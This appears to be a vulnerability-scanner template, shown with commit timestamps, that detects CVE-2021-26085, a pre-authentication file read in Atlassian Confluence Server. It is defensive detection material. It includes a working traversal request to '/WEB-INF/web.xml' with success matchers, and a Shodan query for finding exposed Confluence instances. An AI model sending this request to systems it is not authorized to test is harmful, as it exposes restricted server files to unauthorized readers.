2021-12-20 09:50:14 +00:00
id : CVE-2021-26085
2022-04-22 10:38:41 +00:00
2021-12-20 09:50:14 +00:00
info :
name : Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
author : princechaddha
severity : medium
description : Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
reference :
- https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-26085
2022-05-17 09:18:12 +00:00
- https://jira.atlassian.com/browse/CONFSERVER-67893
- http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
2021-12-21 12:32:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-12-21 12:32:40 +00:00
cve-id : CVE-2021-26085
cwe-id : CWE-862
2022-03-19 10:42:08 +00:00
metadata :
shodan-query : http.component:"Atlassian Confluence"
2022-07-21 17:18:22 +00:00
tags : cve,cve2021,confluence,atlassian,lfi,kev
2021-12-20 09:50:14 +00:00
requests :
- method : GET
path :
2021-12-23 16:10:28 +00:00
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
2021-12-20 09:50:14 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
- "<display-name>Confluence</display-name>"
- "com.atlassian.confluence.setup.ConfluenceAppConfig"
condition : and